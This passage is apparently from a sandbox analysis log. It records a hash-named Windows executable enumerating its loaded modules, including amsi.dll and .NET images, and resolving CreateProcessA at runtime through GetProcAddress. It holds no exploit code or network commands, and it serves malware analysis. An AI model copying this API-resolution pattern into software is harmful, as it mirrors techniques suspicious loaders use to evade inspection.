lpFilename="C:\\Windows\\SYSTEM32\\OLEAUT32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll")) returned 0x20 [0108.518] CoTaskMemFree (pv=0x6b7260) [0108.519] GetModuleInformation (in: hProcess=0x32c, hModule=0x6ca30000, lpmodinfo=0x2444cdc, cb=0xc | out: lpmodinfo=0x2444cdc*(lpBaseOfDll=0x6ca30000, SizeOfImage=0x9cc000, EntryPoint=0x0)) returned 1 [0108.519] CoTaskMemAlloc (cb=0x804) returned 0x6b7260 [0108.519] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x6ca30000, lpBaseName=0x6b7260, nSize=0x800 | out: lpBaseName="System.ni.dll") returned 0xd [0108.520] CoTaskMemFree (pv=0x6b7260) [0108.520] CoTaskMemAlloc (cb=0x804) returned 0x6b7260 [0108.520] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x6ca30000, lpFilename=0x6b7260, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System\\1be7a15b1f33bf22e4f53aaf45518c77\\System.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system\\1be7a15b1f33bf22e4f53aaf45518c77\\system.ni.dll")) returned 0x64 [0108.522] CoTaskMemFree (pv=0x6b7260) [0108.522] GetModuleInformation (in: hProcess=0x32c, hModule=0x6e900000, lpmodinfo=0x2446e78, cb=0xc | out: lpmodinfo=0x2446e78*(lpBaseOfDll=0x6e900000, SizeOfImage=0x721000, EntryPoint=0x0)) returned 1 [0108.523] CoTaskMemAlloc (cb=0x804) returned 0x6b7260 [0108.523] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x6e900000, lpBaseName=0x6b7260, nSize=0x800 | out: lpBaseName="System.Core.ni.dll") returned 0x12 [0108.523] CoTaskMemFree (pv=0x6b7260) [0108.523] CoTaskMemAlloc (cb=0x804) returned 0x6b7260 [0108.523] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x6e900000, lpFilename=0x6b7260, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\eb4cca4f06a15158c3f7e2c56516729b\\System.Core.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.core\\eb4cca4f06a15158c3f7e2c56516729b\\system.core.ni.dll")) returned 0x6e [0108.524] CoTaskMemFree (pv=0x6b7260) [0108.524] GetModuleInformation (in: hProcess=0x32c, hModule=0x6e8f0000, lpmodinfo=0x2449034, cb=0xc | out: lpmodinfo=0x2449034*(lpBaseOfDll=0x6e8f0000, SizeOfImage=0xd000, EntryPoint=0x6e8f63e0)) returned 1 [0108.525] CoTaskMemAlloc (cb=0x804) returned 0x6b7260 [0108.525] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x6e8f0000, lpBaseName=0x6b7260, nSize=0x800 | out: lpBaseName="amsi.dll") returned 0x8 [0108.526] CoTaskMemFree (pv=0x6b7260) [0108.526] CoTaskMemAlloc (cb=0x804) returned 0x6b7260 [0108.526] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x6e8f0000, lpFilename=0x6b7260, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll")) returned 0x1c [0108.526] CoTaskMemFree (pv=0x6b7260) [0108.526] GetModuleInformation (in: hProcess=0x32c, hModule=0x764d0000, lpmodinfo=0x244b138, cb=0xc | out: lpmodinfo=0x244b138*(lpBaseOfDll=0x764d0000, SizeOfImage=0x6000, EntryPoint=0x764d1460)) returned 1 [0108.527] CoTaskMemAlloc (cb=0x804) returned 0x6b7260 [0108.527] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x764d0000, lpBaseName=0x6b7260, nSize=0x800 | out: lpBaseName="psapi.dll") returned 0x9 [0108.528] CoTaskMemFree (pv=0x6b7260) [0108.528] CoTaskMemAlloc (cb=0x804) returned 0x6b7260 [0108.528] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x764d0000, lpFilename=0x6b7260, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll")) returned 0x1d [0108.529] CoTaskMemFree (pv=0x6b7260) [0108.529] GetModuleInformation (in: hProcess=0x32c, hModule=0x71560000, lpmodinfo=0x244d23c, cb=0xc | out: lpmodinfo=0x244d23c*(lpBaseOfDll=0x71560000, SizeOfImage=0x1b000, EntryPoint=0x71569050)) returned 1 [0108.529] CoTaskMemAlloc (cb=0x804) returned 0x6b7260 [0108.530] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x71560000, lpBaseName=0x6b7260, nSize=0x800 | out: lpBaseName="bcrypt.dll") returned 0xa [0108.530] CoTaskMemFree (pv=0x6b7260) [0108.530] CoTaskMemAlloc (cb=0x804) returned 0x6b7260 [0108.530] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x71560000, lpFilename=0x6b7260, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll")) returned 0x1e [0108.531] CoTaskMemFree (pv=0x6b7260) [0108.531] GetModuleInformation (in: hProcess=0x32c, hModule=0x74eb0000, lpmodinfo=0x244f348, cb=0xc | out: lpmodinfo=0x244f348*(lpBaseOfDll=0x74eb0000, SizeOfImage=0x13ff000, EntryPoint=0x7506b990)) returned 1 [0108.532] CoTaskMemAlloc (cb=0x804) returned 0x6b7260 [0108.532] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x74eb0000, lpBaseName=0x6b7260, nSize=0x800 | out: lpBaseName="shell32.dll") returned 0xb [0108.533] CoTaskMemFree (pv=0x6b7260) [0108.533] CoTaskMemAlloc (cb=0x804) returned 0x6b7260 [0108.533] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x74eb0000, lpFilename=0x6b7260, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll")) returned 0x1f [0108.534] CoTaskMemFree (pv=0x6b7260) [0108.534] GetModuleInformation (in: hProcess=0x32c, hModule=0x76800000, lpmodinfo=0x2451560, cb=0xc | out: lpmodinfo=0x2451560*(lpBaseOfDll=0x76800000, SizeOfImage=0x37000, EntryPoint=0x76803b50)) returned 1 [0108.534] CoTaskMemAlloc (cb=0x804) returned 0x6b7260 [0108.534] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x76800000, lpBaseName=0x6b7260, nSize=0x800 | out: lpBaseName="cfgmgr32.dll") returned 0xc [0108.535] CoTaskMemFree (pv=0x6b7260) [0108.535] CoTaskMemAlloc (cb=0x804) returned 0x6b7260 [0108.535] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x76800000, lpFilename=0x6b7260, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll")) returned 0x20 [0108.536] CoTaskMemFree (pv=0x6b7260) [0108.536] GetModuleInformation (in: hProcess=0x32c, hModule=0x745b0000, lpmodinfo=0x2453674, cb=0xc | out: lpmodinfo=0x2453674*(lpBaseOfDll=0x745b0000, SizeOfImage=0x4f9000, EntryPoint=0x747b7610)) returned 1 [0108.537] CoTaskMemAlloc (cb=0x804) returned 0x6b7260 [0108.537] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x745b0000, lpBaseName=0x6b7260, nSize=0x800 | out: lpBaseName="windows.storage.dll") returned 0x13 [0108.538] CoTaskMemFree (pv=0x6b7260) [0108.538] CoTaskMemAlloc (cb=0x804) returned 0x6b7260 [0108.538] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x745b0000, lpFilename=0x6b7260, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll")) returned 0x27 [0108.539] CoTaskMemFree (pv=0x6b7260) [0108.539] GetModuleInformation (in: hProcess=0x32c, hModule=0x74520000, lpmodinfo=0x24557a0, cb=0xc | out: lpmodinfo=0x24557a0*(lpBaseOfDll=0x74520000, SizeOfImage=0x8d000, EntryPoint=0x74569b90)) returned 1 [0108.540] CoTaskMemAlloc (cb=0x804) returned 0x6b7260 [0108.540] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x74520000, lpBaseName=0x6b7260, nSize=0x800 | out: lpBaseName="shcore.dll") returned 0xa [0108.541] CoTaskMemFree (pv=0x6b7260) [0108.541] CoTaskMemAlloc (cb=0x804) returned 0x6b7260 [0108.541] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x74520000, lpFilename=0x6b7260, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\shcore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll")) returned 0x1e [0108.541] CoTaskMemFree (pv=0x6b7260) [0108.542] GetModuleInformation (in: hProcess=0x32c, hModule=0x76470000, lpmodinfo=0x24578ac, cb=0xc | out: lpmodinfo=0x24578ac*(lpBaseOfDll=0x76470000, SizeOfImage=0x44000, EntryPoint=0x76477410)) returned 1 [0108.542] CoTaskMemAlloc (cb=0x804) returned 0x6b7260 [0108.542] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x76470000, lpBaseName=0x6b7260, nSize=0x800 | out: lpBaseName="powrprof.dll") returned 0xc [0108.543] CoTaskMemFree (pv=0x6b7260) [0108.543] CoTaskMemAlloc (cb=0x804) returned 0x6b7260 [0108.543] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x76470000, lpFilename=0x6b7260, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll")) returned 0x20 [0108.544] CoTaskMemFree (pv=0x6b7260) [0108.544] GetModuleInformation (in: hProcess=0x32c, hModule=0x73f20000, lpmodinfo=0x24599c0, cb=0xc | out: lpmodinfo=0x24599c0*(lpBaseOfDll=0x73f20000, SizeOfImage=0xf000, EntryPoint=0x73f22e40)) returned 1 [0108.545] CoTaskMemAlloc (cb=0x804) returned 0x6b7260 [0108.545] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x73f20000, lpBaseName=0x6b7260, nSize=0x800 | out: lpBaseName="profapi.dll") returned 0xb [0108.546] CoTaskMemFree (pv=0x6b7260) [0108.546] CoTaskMemAlloc (cb=0x804) returned 0x6b7260 [0108.546] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x73f20000, lpFilename=0x6b7260, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll")) returned 0x1f [0108.547] CoTaskMemFree (pv=0x6b7260) [0108.547] CloseHandle (hObject=0x32c) returned 1 [0108.623] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateProcessA", cchWideChar=14, lpMultiByteStr=0x19eac8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateProcessA2\x02b\x84Hó(ú\x1bo@î\x19", lpUsedDefaultChar=0x0) returned 14 [0108.623] GetProcAddress (hModule=0x76720000, lpProcName="CreateProcessA") returned 0x76760750 [0108.646] GetCurrentProcessId () returned 0x139c [0108.646] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x139c) returned 0x32c [0108.646] EnumProcessModules (in: hProcess=0x32c, lphModule=0x245e840, cb=0x100, lpcbNeeded=0x19eae0 | out: lphModule=0x245e840, lpcbNeeded=0x19eae0) returned 1 [0108.647] GetModuleInformation (in: hProcess=0x32c, hModule=0x400000, lpmodinfo=0x245e980, cb=0xc | out: lpmodinfo=0x245e980*(lpBaseOfDll=0x400000, SizeOfImage=0x178000, EntryPoint=0x0)) returned 1 [0108.647] CoTaskMemAlloc (cb=0x804) returned 0x6b7760 [0108.647] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x400000, lpBaseName=0x6b7760, nSize=0x800 | out: lpBaseName="08b3772f35997a0eb0894e7e58b4a324324de6121f557976909bdaa31a2c883e.exe") returned 0x44 [0108.647] CoTaskMemFree (pv=0x6b7760) [0108.647] CoTaskMemAlloc (cb=0x804) returned 0x6b7760 [0108.647] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x400000, lpFilename=0x6b7760, nSize=0x800 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\08b3772f35997a0eb0894e7e58b4a324324de6121f557976909bdaa31a2c883e.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\08b3772f35997a0eb0894e7e58b4a324324de6121f557976909bdaa31a2c883e.exe")) returned 0x62 [0108.647] CoTaskMemFree (pv=0x6b7760) [0108.648] GetModuleInformation (in: hProcess=0x32c, hModule=0x771d0000, lpmodinfo=0x2460ba4, cb=0xc | out: lpmodinfo=0x2460ba4*(lpBaseOfDll=0x771d0000, SizeOfImage=0x17b000, EntryPoint=0x0)) returned 1 [0108.648] CoTaskMemAlloc (cb=0x804) returned 0x6b7760 [0108.648] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x771d0000, lpBaseName=0x6b7760, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0108.648] CoTaskMemFree (pv=0x6b7760) [0108.648] CoTaskMemAlloc (cb=0x804) returned 0x6b7760 [0108.648] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x771d0000, lpFilename=0x6b7760, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")) returned 0x1d [0108.648] CoTaskMemFree (pv=0x6b7760) [0108.648] GetModuleInformation (in: hProcess=0x32c, hModule=0x6f8b0000, lpmodinfo=0x2462ca8, cb=0xc | out: lpmodinfo=0x2462ca8*(lpBaseOfDll=0x6f8b0000, SizeOfImage=0x59000, EntryPoint=0x6f8c0780)) returned 1 [0108.649] CoTaskMemAlloc (cb=0x804) returned 0x6b7760 [0108.649] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x6f8b0000, lpBaseName=0x6b7760, nSize=0x800 | out: lpBaseName="MSCOREE.DLL") returned 0xb [0108.649] CoTaskMemFree (pv=0x6b7760) [0108.649] CoTaskMemAlloc (cb=0x804) returned 0x6b7760 [0108.649] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x6f8b0000, lpFilename=0x6b7760, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\MSCOREE.DLL" (normalized: "c:\\windows\\syswow64\\mscoree.dll")) returned 0x1f [0108.649] CoTaskMemFree (pv=0x6b7760) [0108.649] GetModuleInformation (in: hProcess=0x32c, hModule=0x76720000, lpmodinfo=0x2464db4, cb=0xc | out: lpmodinfo=0x2464db4*(lpBaseOfDll=0x76720000, SizeOfImage=0xe0000, EntryPoint=0x76733980)) returned 1 [0108.649] CoTaskMemAlloc (cb=0x804) returned 0x6b7760 [0108.649] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x76720000, lpBaseName=0x6b7760, nSize=0x800 | out: lpBaseName="KERNEL32.dll") returned 0xc [0108.650] CoTaskMemFree (pv=0x6b7760) [0108.650] CoTaskMemAlloc (cb=0x804) returned 0x6b7760 [0108.650] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x76720000, lpFilename=0x6b7760, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\KERNEL32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")) returned 0x20 [0108.650] CoTaskMemFree (pv=0x6b7760) [0108.650] GetModuleInformation (in: hProcess=0x32c, hModule=0x76910000, lpmodinfo=0x2466ec8, cb=0xc | out: lpmodinfo=0x2466ec8*(lpBaseOfDll=0x76910000, SizeOfImage=0x17e000, EntryPoint=0x769c1b90)) returned 1 [0108.650] CoTaskMemAlloc (cb=0x804) returned 0x6b7760 [0108.650] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x76910000, lpBaseName=0x6b7760, nSize=0x800 | out: lpBaseName="KERNELBASE.dll") returned 0xe [0108.650] CoTaskMemFree (pv=0x6b7760) [0108.651] CoTaskMemAlloc (cb=0x804) returned 0x6b7760 [0108.651] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x76910000, lpFilename=0x6b7760, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\KERNELBASE.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")) returned 0x22 [0108.651] CoTaskMemFree (pv=0x6b7760) [0108.651] GetModuleInformation (in: hProcess=0x32c, hModule=0x73e50000, lpmodinfo=0x2469010, cb=0xc | out: lpmodinfo=0x2469010*(lpBaseOfDll=0x73e50000, SizeOfImage=0x92000, EntryPoint=0x73e90380)) returned 1 [0108.651] CoTaskMemAlloc (cb=0x804) returned 0x6b7760 [0108.651] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x73e50000, lpBaseName=0x6b7760, nSize=0x800 | out: lpBaseName="apphelp.dll") returned 0xb [0108.651] CoTaskMemFree (pv=0x6b7760) [0108.651] CoTaskMemAlloc (cb=0x804) returned 0x6b7760 [0108.651] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x73e50000, lpFilename=0x6b7760, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll")) returned 0x1f [0108.652] CoTaskMemFree (pv=0x6b7760) [0108.652] GetModuleInformation (in: hProcess=0x32c, hModule=0x76600000, lpmodinfo=0x246b11c, cb=0xc | out: lpmodinfo=0x246b11c*(lpBaseOfDll=0x76600000, SizeOfImage=0x7b000, EntryPoint=0x7661e970)) returned 1 [0108.652] CoTaskMemAlloc (cb=0x804) returned 0x6b7760 [0108.652] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x76600000, lpBaseName=0x6b7760, nSize=0x800 | out: lpBaseName="ADVAPI32.dll") returned 0xc [0108.652] CoTaskMemFree (pv=0x6b7760) [0108.652] CoTaskMemAlloc (cb=0x804) returned 0x6b7760 [0108.652] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x76600000, lpFilename=0x6b7760, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ADVAPI32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll")) returned 0x20 [0108.653] CoTaskMemFree (pv=0x6b7760) [0108.653] GetModuleInformation (in: hProcess=0x32c, hModule=0x76a90000, lpmodinfo=0x246d230, cb=0xc | out: lpmodinfo=0x246d230*(lpBaseOfDll=0x76a90000, SizeOfImage=0xbe000, EntryPoint=0x76ac5630)) returned 1 [0108.653] CoTaskMemAlloc (cb=0x804) returned 0x6b7760 [0108.653] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x76a90000, lpBaseName=0x6b7760, nSize=0x800 | out: lpBaseName="msvcrt.dll") returned 0xa [0108.653] CoTaskMemFree (pv=0x6b7760) [0108.654] CoTaskMemAlloc (cb=0x804) returned 0x6b7760 [0108.654] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x76a90000, lpFilename=0x6b7760, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")) returned 0x1e [0108.654] CoTaskMemFree (pv=0x6b7760) [0108.654] GetModuleInformation (in: hProcess=0x32c, hModule=0x76cb0000, lpmodinfo=0x246f33c, cb=0xc | out: lpmodinfo=0x246f33c*(lpBaseOfDll=0x76cb0000, SizeOfImage=0x44000, EntryPoint=0x76cc9d80)) returned 1 [0108.654] CoTaskMemAlloc (cb=0x804) returned 0x6b7760 [0108.654] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x76cb0000, lpBaseName=0x6b7760, nSize=0x800 | out: lpBaseName="sechost.dll") returned 0xb [0108.655] CoTaskMemFree (pv=0x6b7760) [0108.655] CoTaskMemAlloc (cb=0x804) returned 0x6b7760 [0108.655] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x76cb0000, lpFilename=0x6b7760, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll")) returned 0x1f [0108.655] CoTaskMemFree (pv=0x6b7760) [0108.655] GetModuleInformation (in: hProcess=0x32c, hModule=0x76c00000, lpmodinfo=0x2471494, cb=0xc | out: lpmodinfo=0x2471494*(lpBaseOfDll=0x76c00000, SizeOfImage=0xad000, EntryPoint=0x76c14f00)) returned 1 [0108.655] CoTaskMemAlloc (cb=0x804) returned 0x6b7760 [0108.655] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x76c00000, lpBaseName=0x6b7760, nSize=0x800 | out: lpBaseName="RPCRT4.dll") returned 0xa [0108.656] CoTaskMemFree (pv=0x6b7760) [0108.656] CoTaskMemAlloc (cb=0x804) returned 0x6b7760 [0108.656] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x76c00000, lpFilename=0x6b7760, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\RPCRT4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll")) returned 0x1e [0108.656] CoTaskMemFree (pv=0x6b7760) [0108.656] GetModuleInformation (in: hProcess=0x32c, hModule=0x73f00000, lpmodinfo=0x24735a0, cb=0xc | out: lpmodinfo=0x24735a0*(lpBaseOfDll=0x73f00000, SizeOfImage=0x1e000, EntryPoint=0x73f0b640)) returned 1 [0108.657] CoTaskMemAlloc (cb=0x804) returned 0x6b7760 [0108.657] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x73f00000, lpBaseName=0x6b7760, nSize=0x800 | out: lpBaseName="SspiCli.dll") returned 0xb [0108.657] CoTaskMemFree (pv=0x6b7760) [0108.657] CoTaskMemAlloc (cb=0x804) returned 0x6b7760 [0108.657] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x73f00000, lpFilename=0x6b7760, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\SspiCli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll")) returned 0x1f [0108.657] CoTaskMemFree (pv=0x6b7760) [0108.657] GetModuleInformation (in: hProcess=0x32c, hModule=0x73ef0000, lpmodinfo=0x24756ac, cb=0xc | out: lpmodinfo=0x24756ac*(lpBaseOfDll=0x73ef0000, SizeOfImage=0xa000, EntryPoint=0x73ef2a00)) returned 1 [0108.658] CoTaskMemAlloc (cb=0x804) returned 0x6b7760 [0108.658] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x73ef0000, lpBaseName=0x6b7760, nSize=0x800 | out: lpBaseName="CRYPTBASE.dll") returned 0xd [0108.658] CoTaskMemFree (pv=0x6b7760) [0108.658] CoTaskMemAlloc (cb=0x804) returned 0x6b7760 [0108.658] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x73ef0000, lpFilename=0x6b7760, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\CRYPTBASE.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll")) returned 0x21 [0108.659] CoTaskMemFree (pv=0x6b7760) [0108.659] GetModuleInformation (in: hProcess=0x32c, hModule=0x76840000, lpmodinfo=0x24777c0, cb=0xc | out: lpmodinfo=0x24777c0*(lpBaseOfDll=0x76840000, SizeOfImage=0x58000, EntryPoint=0x768825c0)) returned 1 [0108.659] CoTaskMemAlloc (cb=0x804) returned 0x6b7760 [0108.659] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x76840000, lpBaseName=0x6b7760, nSize=0x800 | out: lpBaseName="bcryptPrimitives.dll") returned 0x14 [0108.660] CoTaskMemFree (pv=0x6b7760) [0108.660] CoTaskMemAlloc (cb=0x804) returned 0x6b7760 [0108.660] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x76840000, lpFilename=0x6b7760, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\bcryptPrimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll")) returned 0x28 [0108.660] CoTaskMemFree (pv=0x6b7760) [0108.660] GetModuleInformation (in: hProcess=0x32c, hModule=0x6f910000, lpmodinfo=0x24798f4, cb=0xc | out: lpmodinfo=0x24798f4*(lpBaseOfDll=0x6f910000, SizeOfImage=0x7d000, EntryPoint=0x6f920db0)) returned 1 [0108.661] CoTaskMemAlloc (cb=0x804) returned 0x6b7760 [0108.661] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x6f910000, lpBaseName=0x6b7760, nSize=0x800 | out: lpBaseName="mscoreei.dll") returned 0xc [0108.662] CoTaskMemFree (pv=0x6b7760) [0108.662] CoTaskMemAlloc (cb=0x804) returned 0x6b7760 [0108.662] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x6f910000, lpFilename=0x6b7760, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll")) returned 0x3a [0108.662] CoTaskMemFree (pv=0x6b7760) [0108.662] GetModuleInformation (in: hProcess=0x32c, hModule=0x76d00000, lpmodinfo=0x247ba3c, cb=0xc | out: lpmodinfo=0x247ba3c*(lpBaseOfDll=0x76d00000, SizeOfImage=0x45000, EntryPoint=0x76d1de90)) returned 1 [0108.663] CoTaskMemAlloc (cb=0x804) returned 0x6b7760 [0108.663] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x76d00000, lpBaseName=0x6b7760, nSize=0x800 | out: lpBaseName="SHLWAPI.dll") returned 0xb [0108.663] CoTaskMemFree (pv=0x6b7760) [0108.663] CoTaskMemAlloc (cb=0x804) returned 0x6b7760 [0108.663] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x76d00000, lpFilename=0x6b7760, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\SHLWAPI.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll")) returned 0x1f [0108.664] CoTaskMemFree (pv=0x6b7760) [0108.664] GetModuleInformation (in: hProcess=0x32c, hModule=0x762b0000, lpmodinfo=0x247db48, cb=0xc | out: lpmodinfo=0x247db48*(lpBaseOfDll=0x762b0000, SizeOfImage=0x1bd000, EntryPoint=0x76392a10)) returned 1 [0108.664] CoTaskMemAlloc (cb=0x804) returned 0x6b7760 [0108.664] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x762b0000, lpBaseName=0x6b7760, nSize=0x800 | out: lpBaseName="combase.dll") returned 0xb [0108.665] CoTaskMemFree (pv=0x6b7760) [0108.665] CoTaskMemAlloc (cb=0x804) returned 0x6b7760 [0108.665] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x762b0000, lpFilename=0x6b7760, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll")) returned 0x1f [0108.665] CoTaskMemFree (pv=0x6b7760) [0108.665] GetModuleInformation (in: hProcess=0x32c, hModule=0x74ab0000, lpmodinfo=0x247fc54, cb=0xc | out: lpmodinfo=0x247fc54*(lpBaseOfDll=0x74ab0000, SizeOfImage=0x14f000, EntryPoint=0x74b66820)) returned 1 [0108.666] CoTaskMemAlloc (cb=0x804) returned 0x6b7760 [0108.666] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x74ab0000, lpBaseName=0x6b7760, nSize=0x800 | out: lpBaseName="GDI32.dll") returned 0x9 [0108.666] CoTaskMemFree (pv=0x6b7760) [0108.666] CoTaskMemAlloc (cb=0x804) returned 0x6b7760 [0108.666] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x74ab0000, lpFilename=0x6b7760, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\GDI32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll")) returned 0x1d [0108.667] CoTaskMemFree (pv=0x6b7760) [0108.667] GetModuleInformation (in: hProcess=0x32c, hModule=0x743d0000, lpmodinfo=0x2481de4, cb=0xc | out: lpmodinfo=0x2481de4*(lpBaseOfDll=0x743d0000, SizeOfImage=0x147000, EntryPoint=0x743e1cf0)) returned 1 [0108.667] CoTaskMemAlloc (cb=0x804) returned 0x6b7760 [0108.667] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x743d0000, lpBaseName=0x6b7760, nSize=0x800 | out: lpBaseName="USER32.dll") returned 0xa [0108.668] CoTaskMemFree (pv=0x6b7760) [0108.668] CoTaskMemAlloc (cb=0x804) returned 0x6b7760 [0108.668] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x743d0000, lpFilename=0x6b7760, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\USER32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll")) returned 0x1e [0108.669] CoTaskMemFree (pv=0x6b7760) [0108.669] GetModuleInformation (in: hProcess=0x32c, hModule=0x741b0000, lpmodinfo=0x2483ef0, cb=0xc | out: lpmodinfo=0x2483ef0*(lpBaseOfDll=0x741b0000, SizeOfImage=0x2b000, EntryPoint=0x741b5680)) returned 1 [0108.669] CoTaskMemAlloc (cb=0x804) returned 0x6b7760 [0108.669] GetModuleBaseNameW (in: hProcess=0x32c, hModule=0x741b0000, lpBaseName=0x6b7760, nSize=0x800 | out: lpBaseName="IMM32.DLL") returned 0x9 [0108.670] CoTaskMemFree (pv=0x6b7760) [0108.670] CoTaskMemAlloc (cb=0x804) returned 0x6b7760 [0108.670] GetModuleFileNameExW (in: hProcess=0x32c, hModule=0x741b0000, lpFilename=0x6b7760, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\IMM32.DLL" (normalized: 